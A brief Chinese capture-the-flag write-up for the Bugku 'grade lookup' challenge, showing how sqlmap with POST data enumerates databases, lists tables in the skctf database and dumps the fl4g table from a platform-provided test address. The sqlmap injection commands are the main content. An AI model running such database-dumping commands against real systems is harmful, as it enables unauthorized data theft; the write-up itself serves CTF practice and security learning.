bugku-成绩查询
注:这个是平台提供的环境,仅测试使用,本次教程结束后会自动关闭。
地址:http://117.72.52.127:14526/index.php
参数说明:
-u "http://117.72.52.127:14526/index.php": 指定目标URL地址 -D : 指定的数据库名 -T : 指定的表名 --data="ID=1": 指定POST数据,其中ID是参数名 --method POST: 强制使用POST方法 --dbs: 获取数据库列表: --tables: 数据库的表 --dump: 获取表数据
一:获取数据库列表
注意:如何得知是id还是其它的,需要自己抓包或者通过浏览器的网络查看。
sqlmap -u 'http://117.72.52.127:14526/index.php' --data="id=1" --method POST --dbs
查询到四个数据库,接下来就开始获取表。
二:获取指定数据库的表
选择 skcft 库,其它库已经查看了,但是我没有截图。
sqlmap -u 'http://117.72.52.127:14526/index.php' --data="id=1" --method POST -D skctf --tables
可以看到有两个表,其中fl4g应该就是我要的表数据了。
三:获取表数据
sqlmap -u 'http://117.72.52.127:14526/index.php' --data="id=1" --method POST -D skctf -T fl4g --dump
拿到flag
